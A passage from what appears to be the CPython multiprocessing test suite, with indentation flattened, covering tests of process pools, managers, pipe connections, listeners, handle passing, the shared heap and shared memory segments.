p = multiprocessing.Pool(2)
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(raising, error_callback=errback)
self.assertRaises(KeyError, res.get)
self.assertTrue(scratchpad[0])
self.assertIsInstance(scratchpad[0], KeyError)
p.close()
p.join()
def test_unpickleable_result(self):
from multiprocessing.pool import MaybeEncodingError
p = multiprocessing.Pool(2)
# Make sure we don't lose pool processes because of encoding errors.
for iteration in range(20):
scratchpad = [None]
def errback(exc):
scratchpad[0] = exc
res = p.apply_async(unpickleable_result, error_callback=errback)
self.assertRaises(MaybeEncodingError, res.get)
wrapped = scratchpad[0]
self.assertTrue(wrapped)
self.assertIsInstance(scratchpad[0], MaybeEncodingError)
self.assertIsNotNone(wrapped.exc)
self.assertIsNotNone(wrapped.value)
p.close()
p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
ALLOWED_TYPES = ('processes', )
def test_pool_worker_lifetime(self):
p = multiprocessing.Pool(3, maxtasksperchild=10)
self.assertEqual(3, len(p._pool))
origworkerpids = [w.pid for w in p._pool]
# Run many tasks so each worker gets replaced (hopefully)
results = []
for i in range(100):
results.append(p.apply_async(sqr, (i, )))
# Fetch the results and verify we got the right answers,
# also ensuring all the tasks have completed.
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
# Refill the pool
p._repopulate_pool()
# Wait until all workers are alive
# (countdown * DELTA = 5 seconds max startup process time)
countdown = 50
while countdown and not all(w.is_alive() for w in p._pool):
countdown -= 1
time.sleep(DELTA)
finalworkerpids = [w.pid for w in p._pool]
# All pids should be assigned. See issue #7805.
self.assertNotIn(None, origworkerpids)
self.assertNotIn(None, finalworkerpids)
# Finally, check that the worker pids have changed
self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
p.close()
p.join()
def test_pool_worker_lifetime_early_close(self):
# Issue #10332: closing a pool whose workers have limited lifetimes
# before all the tasks completed would make join() hang.
p = multiprocessing.Pool(3, maxtasksperchild=1)
results = []
for i in range(6):
results.append(p.apply_async(sqr, (i, 0.3)))
p.close()
p.join()
# check the results
for (j, res) in enumerate(results):
self.assertEqual(res.get(), sqr(j))
def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
# tests cases against bpo-38744 and bpo-39360
cmd = '''if 1:
from multiprocessing import Pool
problem = None
class A:
def __init__(self):
self.pool = Pool(processes=1)
def test():
global problem
problem = A()
problem.pool.map(float, tuple(range(10)))
if __name__ == "__main__":
test()
'''
rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
def f(self):
return 'f()'
def g(self):
raise ValueError
def _h(self):
return '_h()'
def baz():
for i in range(10):
yield i*i
class IteratorProxy(BaseProxy):
_exposed_ = ('__next__',)
def __iter__(self):
return self
def __next__(self):
return self._callmethod('__next__')
class MyManager(BaseManager):
pass
MyManager.register('Foo', callable=FooBar)
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
def test_mymanager(self):
manager = MyManager()
manager.start()
self.common(manager)
manager.shutdown()
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context(self):
with MyManager() as manager:
self.common(manager)
# bpo-30356: BaseManager._finalize_manager() sends SIGTERM
# to the manager process if it takes longer than 1 second to stop,
# which happens on slow buildbots.
self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))
def test_mymanager_context_prestarted(self):
manager = MyManager()
manager.start()
with manager:
self.common(manager)
self.assertEqual(manager._process.exitcode, 0)
def common(self, manager):
foo = manager.Foo()
bar = manager.Bar()
baz = manager.baz()
foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]
self.assertEqual(foo_methods, ['f', 'g'])
self.assertEqual(bar_methods, ['f', '_h'])
self.assertEqual(foo.f(), 'f()')
self.assertRaises(ValueError, foo.g)
self.assertEqual(foo._callmethod('f'), 'f()')
self.assertRaises(RemoteError, foo._callmethod, '_h')
self.assertEqual(bar.f(), 'f()')
self.assertEqual(bar._h(), '_h()')
self.assertEqual(bar._callmethod('f'), 'f()')
self.assertEqual(bar._callmethod('_h'), '_h()')
self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
'''manager class used by server process'''
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
'''manager class which specifies the same interface as QueueManager'''
QueueManager2.register('get_queue')
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
ALLOWED_TYPES = ('manager',)
values = ['hello world', None, True, 2.25,
'hall\xe5 v\xe4rlden',
'\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
b'hall\xe5 v\xe4rlden',
]
result = values[:]
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager2(
address=address, authkey=authkey, serializer=SERIALIZER
)
manager.connect()
queue = manager.get_queue()
# Note that xmlrpclib will deserialize object as a list not a tuple
queue.put(tuple(cls.values))
def test_remote(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
)
manager.start()
self.addCleanup(manager.shutdown)
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.daemon = True
p.start()
manager2 = QueueManager2(
address=manager.address, authkey=authkey, serializer=SERIALIZER
)
manager2.connect()
queue = manager2.get_queue()
self.assertEqual(queue.get(), self.result)
# Because we are using xmlrpclib for serialization instead of
# pickle this will cause a serialization error.
self.assertRaises(Exception, queue.put, time.sleep)
# Make queue finalizer run before the server is stopped
del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
@classmethod
def _putter(cls, address, authkey):
manager = QueueManager(
address=address, authkey=authkey, serializer=SERIALIZER)
manager.connect()
queue = manager.get_queue()
queue.put('hello world')
def test_rapid_restart(self):
authkey = os.urandom(32)
manager = QueueManager(
address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
try:
srvr = manager.get_server()
addr = srvr.address
# Close the connection.Listener socket which gets opened as a part
# of manager.get_server(). It's not needed for the test.
srvr.listener.close()
manager.start()
p = self.Process(target=self._putter, args=(manager.address, authkey))
p.start()
p.join()
queue = manager.get_queue()
self.assertEqual(queue.get(), 'hello world')
del queue
finally:
if hasattr(manager, "shutdown"):
manager.shutdown()
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
try:
manager.start()
self.addCleanup(manager.shutdown)
except OSError as e:
if e.errno != errno.EADDRINUSE:
raise
# Retry after some time, in case the old socket was lingering
# (sporadic failure on buildbots)
time.sleep(1.0)
manager = QueueManager(
address=addr, authkey=authkey, serializer=SERIALIZER)
if hasattr(manager, "shutdown"):
self.addCleanup(manager.shutdown)
#
#
#
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
"test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
"largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
"test needs os.dup2()")
def test_large_fd_transfer(self):
# With fd > 256 (issue #11657)
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
for newfd in range(256, MAXFD):
if not self._is_fd_assigned(newfd):
break
else:
self.fail("could not find an unassigned large file descriptor")
os.dup2(fd, newfd)
try:
reduction.send_handle(conn, newfd, p.pid)
finally:
os.close(newfd)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(self, conn):
os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
# Check that exception is raised when received data is not
# accompanied by a file descriptor in ancillary data.
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
p.daemon = True
p.start()
self.assertRaises(RuntimeError, reduction.recv_handle, conn)
p.join()
def test_context(self):
a, b = self.Pipe()
with a, b:
a.send(1729)
self.assertEqual(b.recv(), 1729)
if self.TYPE == 'processes':
self.assertFalse(a.closed)
self.assertFalse(b.closed)
if self.TYPE == 'processes':
self.assertTrue(a.closed)
self.assertTrue(b.closed)
self.assertRaises(OSError, a.recv)
self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_multiple_bind(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
self.addCleanup(l.close)
self.assertRaises(OSError, self.connection.Listener,
l.address, family)
def test_context(self):
with self.connection.Listener() as l:
with self.connection.Client(l.address) as c:
with l.accept() as d:
c.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, l.accept)
@unittest.skipUnless(util.abstract_sockets_supported,
"test needs abstract socket support")
def test_abstract_socket(self):
with self.connection.Listener("\0something") as listener:
with self.connection.Client(listener.address) as client:
with listener.accept() as d:
client.send(1729)
self.assertEqual(d.recv(), 1729)
if self.TYPE == 'processes':
self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _test(cls, address):
conn = cls.connection.Client(address)
conn.send('hello')
conn.close()
def test_listener_client(self):
for family in self.connection.families:
l = self.connection.Listener(family=family)
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
p.join()
l.close()
def test_issue14725(self):
l = self.connection.Listener()
p = self.Process(target=self._test, args=(l.address,))
p.daemon = True
p.start()
time.sleep(1)
# On Windows the client process should by now have connected,
# written data and closed the pipe handle by now. This causes
# ConnectNamdedPipe() to fail with ERROR_NO_DATA. See Issue
# 14725.
conn = l.accept()
self.assertEqual(conn.recv(), 'hello')
conn.close()
p.join()
l.close()
def test_issue16955(self):
for fam in self.connection.families:
l = self.connection.Listener(family=fam)
c = self.connection.Client(l.address)
a = l.accept()
a.send_bytes(b"hello")
self.assertTrue(c.poll(1))
a.close()
c.close()
l.close()
class _TestPoll(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_empty_string(self):
a, b = self.Pipe()
self.assertEqual(a.poll(), False)
b.send_bytes(b'')
self.assertEqual(a.poll(), True)
self.assertEqual(a.poll(), True)
@classmethod
def _child_strings(cls, conn, strings):
for s in strings:
time.sleep(0.1)
conn.send_bytes(s)
conn.close()
def test_strings(self):
strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
a, b = self.Pipe()
p = self.Process(target=self._child_strings, args=(b, strings))
p.start()
for s in strings:
for i in range(200):
if a.poll(0.01):
break
x = a.recv_bytes()
self.assertEqual(s, x)
p.join()
@classmethod
def _child_boundaries(cls, r):
# Polling may "pull" a message in to the child process, but we
# don't want it to pull only part of a message, as that would
# corrupt the pipe for any other processes which might later
# read from it.
r.poll(5)
def test_boundaries(self):
r, w = self.Pipe(False)
p = self.Process(target=self._child_boundaries, args=(r,))
p.start()
time.sleep(2)
L = [b"first", b"second"]
for obj in L:
w.send_bytes(obj)
w.close()
p.join()
self.assertIn(r.recv_bytes(), L)
@classmethod
def _child_dont_merge(cls, b):
b.send_bytes(b'a')
b.send_bytes(b'b')
b.send_bytes(b'cd')
def test_dont_merge(self):
a, b = self.Pipe()
self.assertEqual(a.poll(0.0), False)
self.assertEqual(a.poll(0.1), False)
p = self.Process(target=self._child_dont_merge, args=(b,))
p.start()
self.assertEqual(a.recv_bytes(), b'a')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.recv_bytes(), b'b')
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(1.0), True)
self.assertEqual(a.poll(0.0), True)
self.assertEqual(a.recv_bytes(), b'cd')
p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@classmethod
def tearDownClass(cls):
from multiprocessing import resource_sharer
resource_sharer.stop(timeout=support.LONG_TIMEOUT)
@classmethod
def _listener(cls, conn, families):
for fam in families:
l = cls.connection.Listener(family=fam)
conn.send(l.address)
new_conn = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
l = socket.create_server((socket_helper.HOST, 0))
conn.send(l.getsockname())
new_conn, addr = l.accept()
conn.send(new_conn)
new_conn.close()
l.close()
conn.recv()
@classmethod
def _remote(cls, conn):
for (address, msg) in iter(conn.recv, None):
client = cls.connection.Client(address)
client.send(msg.upper())
client.close()
address, msg = conn.recv()
client = socket.socket()
client.connect(address)
client.sendall(msg.upper())
client.close()
conn.close()
def test_pickling(self):
families = self.connection.families
lconn, lconn0 = self.Pipe()
lp = self.Process(target=self._listener, args=(lconn0, families))
lp.daemon = True
lp.start()
lconn0.close()
rconn, rconn0 = self.Pipe()
rp = self.Process(target=self._remote, args=(rconn0,))
rp.daemon = True
rp.start()
rconn0.close()
for fam in families:
msg = ('This connection uses family %s' % fam).encode('ascii')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
self.assertEqual(new_conn.recv(), msg.upper())
rconn.send(None)
msg = latin('This connection uses a normal socket')
address = lconn.recv()
rconn.send((address, msg))
new_conn = lconn.recv()
buf = []
while True:
s = new_conn.recv(100)
if not s:
break
buf.append(s)
buf = b''.join(buf)
self.assertEqual(buf, msg.upper())
new_conn.close()
lconn.send(None)
rconn.close()
lconn.close()
lp.join()
rp.join()
@classmethod
def child_access(cls, conn):
w = conn.recv()
w.send('all is well')
w.close()
r = conn.recv()
msg = r.recv()
conn.send(msg*2)
conn.close()
def test_access(self):
# On Windows, if we do not specify a destination pid when
# using DupHandle then we need to be careful to use the
# correct db flags for DuplicateHandle(), or else
# DupHandle.detach() will raise PermissionError. For example,
# for a read only pipe handle we should use
# db=FILE_GENERIC_READ. (Unfortunately
# DUPLICATE_SAME_ACCESS does not work.)
conn, child_conn = self.Pipe()
p = self.Process(target=self.child_access, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close()
r, w = self.Pipe(duplex=False)
conn.send(w)
w.close()
self.assertEqual(r.recv(), 'all is well')
r.close()
r, w = self.Pipe(duplex=False)
conn.send(r)
r.close()
w.send('foobar')
w.close()
self.assertEqual(conn.recv(), 'foobar'*2)
p.join()
#
#
#
class _TestHeap(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
super().setUp()
# Make pristine heap for these tests
self.old_heap = multiprocessing.heap.BufferWrapper._heap
multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()
def tearDown(self):
multiprocessing.heap.BufferWrapper._heap = self.old_heap
super().tearDown()
def test_heap(self):
iterations = 5000
maxblocks = 50
blocks = []
# get the heap object
heap = multiprocessing.heap.BufferWrapper._heap
heap._DISCARD_FREE_SPACE_LARGER_THAN = 0
# create and destroy lots of blocks of different sizes
for i in range(iterations):
size = int(random.lognormvariate(0, 1) * 1000)
b = multiprocessing.heap.BufferWrapper(size)
blocks.append(b)
if len(blocks) > maxblocks:
i = random.randrange(maxblocks)
del blocks[i]
del b
# verify the state of the heap
with heap._lock:
all = []
free = 0
occupied = 0
for L in list(heap._len_to_seq.values()):
# count all free blocks in arenas
for arena, start, stop in L:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'free'))
free += (stop-start)
for arena, arena_blocks in heap._allocated_blocks.items():
# count all allocated blocks in arenas
for start, stop in arena_blocks:
all.append((heap._arenas.index(arena), start, stop,
stop-start, 'occupied'))
occupied += (stop-start)
self.assertEqual(free + occupied,
sum(arena.size for arena in heap._arenas))
all.sort()
for i in range(len(all)-1):
(arena, start, stop) = all[i][:3]
(narena, nstart, nstop) = all[i+1][:3]
if arena != narena:
# Two different arenas
self.assertEqual(stop, heap._arenas[arena].size) # last block
self.assertEqual(nstart, 0) # first block
else:
# Same arena: two adjacent blocks
self.assertEqual(stop, nstart)
# test free'ing all blocks
random.shuffle(blocks)
while blocks:
blocks.pop()
self.assertEqual(heap._n_frees, heap._n_mallocs)
self.assertEqual(len(heap._pending_free_blocks), 0)
self.assertEqual(len(heap._arenas), 0)
self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
self.assertEqual(len(heap._len_to_seq), 0)
def test_free_from_gc(self):
# Check that freeing of blocks by the garbage collector doesn't deadlock
# (issue #12352).
# Make sure the GC is enabled, and set lower collection thresholds to
# make collections more frequent (and increase the probability of
# deadlock).
if not gc.isenabled():
gc.enable()
self.addCleanup(gc.disable)
thresholds = gc.get_threshold()
self.addCleanup(gc.set_threshold, *thresholds)
gc.set_threshold(10)
# perform numerous block allocations, with cyclic references to make
# sure objects are collected asynchronously by the gc
for i in range(5000):
a = multiprocessing.heap.BufferWrapper(1)
b = multiprocessing.heap.BufferWrapper(1)
# circular references
a.buddy = b
b.buddy = a
#
#
#
class _Foo(Structure):
_fields_ = [
('x', c_int),
('y', c_double),
('z', c_longlong,)
]
class _TestSharedCTypes(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def setUp(self):
if not HAS_SHAREDCTYPES:
self.skipTest("requires multiprocessing.sharedctypes")
@classmethod
def _double(cls, x, y, z, foo, arr, string):
x.value *= 2
y.value *= 2
z.value *= 2
foo.x *= 2
foo.y *= 2
string.value *= 2
for i in range(len(arr)):
arr[i] *= 2
def test_sharedctypes(self, lock=False):
x = Value('i', 7, lock=lock)
y = Value(c_double, 1.0/3.0, lock=lock)
z = Value(c_longlong, 2 ** 33, lock=lock)
foo = Value(_Foo, 3, 2, lock=lock)
arr = self.Array('d', list(range(10)), lock=lock)
string = self.Array('c', 20, lock=lock)
string.value = latin('hello')
p = self.Process(target=self._double, args=(x, y, z, foo, arr, string))
p.daemon = True
p.start()
p.join()
self.assertEqual(x.value, 14)
self.assertAlmostEqual(y.value, 2.0/3.0)
self.assertEqual(z.value, 2 ** 34)
self.assertEqual(foo.x, 6)
self.assertAlmostEqual(foo.y, 4.0)
for i in range(10):
self.assertAlmostEqual(arr[i], i*2)
self.assertEqual(string.value, latin('hellohello'))
def test_synchronize(self):
self.test_sharedctypes(lock=True)
def test_copy(self):
foo = _Foo(2, 5.0, 2 ** 33)
bar = copy(foo)
foo.x = 0
foo.y = 0
foo.z = 0
self.assertEqual(bar.x, 2)
self.assertAlmostEqual(bar.y, 5.0)
self.assertEqual(bar.z, 2 ** 33)
@unittest.skipUnless(HAS_SHMEM, "requires multiprocessing.shared_memory")
@hashlib_helper.requires_hashdigest('md5')
class _TestSharedMemory(BaseTestCase):
ALLOWED_TYPES = ('processes',)
@staticmethod
def _attach_existing_shmem_then_write(shmem_name_or_obj, binary_data):
if isinstance(shmem_name_or_obj, str):
local_sms = shared_memory.SharedMemory(shmem_name_or_obj)
else:
local_sms = shmem_name_or_obj
local_sms.buf[:len(binary_data)] = binary_data
local_sms.close()
def test_shared_memory_basics(self):
sms = shared_memory.SharedMemory('test01_tsmb', create=True, size=512)
self.addCleanup(sms.unlink)
# Verify attributes are readable.
self.assertEqual(sms.name, 'test01_tsmb')
self.assertGreaterEqual(sms.size, 512)
self.assertGreaterEqual(len(sms.buf), sms.size)
# Modify contents of shared memory segment through memoryview.
sms.buf[0] = 42
self.assertEqual(sms.buf[0], 42)
# Attach to existing shared memory segment.
also_sms = shared_memory.SharedMemory('test01_tsmb')
self.assertEqual(also_sms.buf[0], 42)
also_sms.close()
# Attach to existing shared memory segment but specify a new size.
same_sms = shared_memory.SharedMemory('test01_tsmb', size=20*sms.size)
self.assertLess(same_sms.size, 20*sms.size) # Size was ignored.
same_sms.close()
# Creating Shared Memory Segment with -ve size
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=True, size=-2)
# Attaching Shared Memory Segment without a name
with self.assertRaises(ValueError):
shared_memory.SharedMemory(create=False)
# Test if shared memory segment is created properly,
# when _make_filename returns an existing shared memory segment name
with unittest.mock.patch(
'multiprocessing.shared_memory._make_filename') as mock_make_filename:
NAME_PREFIX = shared_memory._SHM_NAME_PREFIX
names = ['test01_fn', 'test02_fn']
# Prepend NAME_PREFIX which can be '/psm_' or 'wnsm_', necessary
# because some POSIX compliant systems require name to start with /
names = [NAME_PREFIX + name for name in names]
mock_make_filename.side_effect = names
shm1 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm1.unlink)
self.assertEqual(shm1._name, names[0])
mock_make_filename.side_effect = names
shm2 = shared_memory.SharedMemory(create=True, size=1)
self.addCleanup(shm2.unlink)
self.assertEqual(shm2._name, names[1])
if shared_memory._USE_POSIX:
# Posix Shared Memory can only be unlinked once. Here we
# test an implementation detail that is not observed across
# all supported platforms (since WindowsNamedSharedMemory
# manages unlinking on its own and unlink() does nothing).
# True release of shared memory segment does not necessarily
# happen until process exits, depending on the OS platform.
with self.assertRaises(FileNotFoundError):
sms_uno = shared_memory.SharedMemory(
'test01_dblunlink',
create=True,
size=5000
)
try:
self.assertGreaterEqual(sms_uno.size, 5000)
sms_duo = shared_memory.SharedMemory('test01_dblunlink')
sms_duo.unlink() # First shm_unlink() call.
sms_duo.close()
sms_uno.close()
finally:
sms_uno.unlink() # A second shm_unlink() call is bad.
with self.assertRaises(FileExistsError):
# Attempting to create a new shared memory segment with a
# name that is already in use triggers an exception.
there_can_only_be_one_sms = shared_memory.SharedMemory(
'test01_tsmb',
create=True,
size=512
)
if shared_memory._USE_POSIX:
# Requesting creation of a shared memory segment with the option
# to attach to an existing segment, if that name is currently in
# use, should not trigger an exception.
# Note: Using a smaller size could possibly cause truncation of
# the existing segment but is OS platform dependent. In the
# case of MacOS/darwin, requesting a smaller size is disallowed.
class OptionalAttachSharedMemory(shared_memory.SharedMemory):
_flags = os.O_CREAT | os.O_RDWR
ok_if_exists_sms = OptionalAttachSharedMemory('test01_tsmb')
self.assertEqual(ok_if_exists_sms.size, sms.size)
ok_if_exists_sms.close()
# Attempting to attach to an existing shared memory segment when
# no segment exists with the supplied name triggers an exception.
with self.assertRaises(FileNotFoundError):
nonexisting_sms = shared_memory.SharedMemory('test01_notthere')
nonexisting_sms.unlink() # Error should occur on prior line.
sms.close()
# Test creating a shared memory segment with negative size
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=-1)
# Test creating a shared memory segment with size 0
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True, size=0)
# Test creating a shared memory segment without size argument
with self.assertRaises(ValueError):
sms_invalid = shared_memory.SharedMemory(create=True)
def test_shared_memory_across_processes(self):
# bpo-40135: don't define shared memory block's name in case of
# the failure when we run multiprocessing tests in parallel.
sms = shared_memory.SharedMemory(create=True, size=512)
self.addCleanup(sms.unlink)
# Verify remote attachment to existing block by name is working.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms.name, b'howdy')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'howdy')
# Verify pickling of SharedMemory instance also works.
p = self.Process(
target=self._attach_existing_shmem_then_write,
args=(sms, b'HELLO')
)
p.daemon = True
p.start()
p.join()
self.assertEqual(bytes(sms.buf[:5]), b'HELLO')
sms.close()
@unittest.skipIf(os.name != "posix", "not feasible in non-posix platforms")
def test_shared_memory_SharedMemoryServer_ignores_sigint(self):
# bpo-36368: protect SharedMemoryManager server process from
# KeyboardInterrupt signals.
smm = multiprocessing.managers.SharedMemoryManager()
smm.start()
# make sure the manager works properly at the beginning
sl = smm.ShareableList(range(10))
# the manager's server should ignore KeyboardInterrupt signals, and
# maintain its connection with the current process, and success when
# asked to deliver memory segments.
os.kill(smm._process.pid, signal.SIGINT)
sl2 = smm.ShareableList(range(10))
